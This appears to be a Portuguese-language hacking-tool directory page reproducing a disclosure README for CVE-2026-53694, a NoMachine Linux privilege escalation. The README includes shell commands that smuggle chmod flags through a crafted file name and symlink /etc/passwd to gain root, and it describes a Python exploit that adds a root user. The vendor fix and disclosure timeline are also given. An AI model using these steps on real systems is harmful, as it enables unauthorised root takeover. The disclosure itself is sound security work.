Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-53694-NoMachine-LPE — Prova de conceito de exploit e relatório para CVE-2026-53694, uma escalada de privilégio local no NoMachine para Linux por meio de injeção de argumento no nxchmod.sh, permitindo acesso root através de manipulação de symlink. | Kitploit
Ferramentas/GitHubGitHub/do4choo/cve-2026-53694-nomachine-lpe
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários
GitHubdo4choo/cve-2026-53694-nomachine-lpe

CVE-2026-53694-NoMachine-LPE

Prova de conceito de exploit e relatório para CVE-2026-53694, uma escalada de privilégio local no NoMachine para Linux por meio de injeção de argumento no nxchmod.sh, permitindo acesso root através de manipulação de symlink.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
2há 3 mesesAinda não revisado

CVE-2026-53694: Escalação de Privilégio Local no NoMachine via Injeção de Argumentos

CVE Status Target Language

Visão Geral

Este repositório contém a descrição detalhada e a Prova de Conceito (PoC) para CVE-2026-53694, uma vulnerabilidade de Escalação de Privilégio Local (LPE) no NoMachine para Linux.

Devido à neutralização inadequada de delimitadores de argumentos no script nxchmod.sh, um usuário local sem privilégios pode injetar argumentos em um comando do sistema executado como root. Ao combinar essa injeção de argumentos com um link simbólico, um atacante pode sobrescrever arquivos críticos do sistema (como /etc/passwd) e escalar seus privilégios para root.

Esta vulnerabilidade foi totalmente corrigida pelo fornecedor.

O Processo de Descoberta

Encontrar esta vulnerabilidade foi um processo de tentativa, erro e uma percepção tarde da noite. Veja como a descoberta se desenrolou:

  1. Observando o Alvo: Percebi que o script /usr/NX/scripts/restricted/nxchmod.sh estava sendo executado periodicamente pelo usuário root para gerenciar permissões em diretórios específicos.
  2. Ideia Inicial (O Beco Sem Saída): Vi que o script estava aplicando chmod a+rw em arquivos. Pensei: Se eu controlo o destino, posso usar um symlink para tornar /etc/passwd gravável? Testei um symlink padrão (ln -s /etc/passwd /tmp/asdf), mas falhou. O sticky bit do Linux em diretórios como /tmp impede que o usuário root siga cegamente um symlink criado por outro usuário.
  3. O Avanço: Ao revisar a execução do script posteriormente, notei como o comando estava sendo construído: ${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}. O script estava pegando o nome literal do arquivo e passando-o diretamente para chmod.
  4. Injeção de Comando via Nome de Arquivo: Percebi que poderia criar um arquivo com espaços e flags em seu nome. Criei um arquivo chamado X1234 -R -L. Quando o script foi executado, o comando chmod expandiu isso em argumentos em vez de um único caminho de arquivo.
  5. Contornando o Sticky Bit: Ao injetar as flags -L (seguir symlinks) e -R (recursivo) no comando chmod através do nome do arquivo, forcei o próprio binário chmod a resolver e seguir o symlink que criei no diretório, contornando completamente a proteção do sticky bit.
  6. Alcançando LPE: Uma vez que /etc/passwd se tornou gravável (a+rw), pude simplesmente adicionar um novo usuário root ao arquivo e usar su para acessá-lo.

Análise Técnica

A vulnerabilidade decorre de como o NoMachine lida com permissões para sockets X11/Wayland. O script nxchmod.sh é gerado pelo daemon nxserver.bin executando como root.

A execução vulnerável se parece com isto:

# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}

Se um atacante cria uma estrutura de diretório e um arquivo chamado X1234 -R -L, o comando resultante executado pelo root se torna: /bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L

Quando um symlink apontando para /etc/passwd é colocado dentro do diretório X1234, os argumentos injetados -R e -L forçam o chmod a seguir recursivamente o symlink e conceder permissões globais de leitura/escrita ao arquivo alvo.

Requisitos para Exploração

Para que este exploit funcione, o sistema alvo deve atender às seguintes condições:

  • O SO deve estar usando Wayland (não X11).
  • Xwayland deve estar ativo.
  • Uma sessão gráfica deve estar em execução (a tela de login é suficiente).

Prova de Conceito

Você pode reproduzir esta vulnerabilidade manualmente usando comandos do shell ou automaticamente usando o script Python fornecido.

Método 1: Execução Manual (Shell)

Navegue até /tmp/.X11-unix/ e execute os seguintes comandos para criar a estrutura de diretório maliciosa.

cd /tmp/.X11-unix/

# 1. Exploitation setup
touch "X1234 -R -L"
mkdir X1234
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn

# Wait for nxchmod.sh to execute (can take up to 60 seconds).
# Verify the permissions of /etc/passwd have changed to -rw-rw-rw-
# You can now edit /etc/passwd to add a root user.

Depois de verificar a vulnerabilidade e escalar privilégios, execute os seguintes comandos de limpeza para restaurar a estabilidade do sistema e remover artefatos:

# 2. Cleanup
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd

Método 2: Exploit Automatizado

Um exploit automatizado completo é fornecido em poc.py. Este script verifica os requisitos do Wayland, configura o symlink, aguarda o ciclo de execução do nxchmod.sh e injeta um novo usuário root (gg) no /etc/passwd

Para executar o exploit:

python3 poc.py

Correção

Esta vulnerabilidade foi corrigida pela NoMachine. Os usuários devem atualizar para as seguintes versões ou posteriores:

  • NoMachine 9.5.7
  • NoMachine 8.23.2

Cronograma

  • 2026-04-20: Vulnerabilidade relatada ao fornecedor.
  • 2026-04-23: Fornecedor confirmou a vulnerabilidade e concordou com a divulgação coordenada.
  • 2026-05-07: Fornecedor lançou versões corrigidas (9.5.7 e 8.23.2) e publicou o Relatório de Problemas TR04X11802.
  • 2026-06-10: CVE-2026-53694 publicado no NVD. (O registro oficial do MITRE está atualmente pendente de análise completa e atualizações de crédito (última verificação em 2026-07-01))

Referências

  • NoMachine Relatório de Problemas TR04X11802
  • NoMachine Atualização de Software SU05X00274
  • NoMachine Atualização de Software SU05X00275
  • NVD - CVE-2026-53694
Baixar ferramenta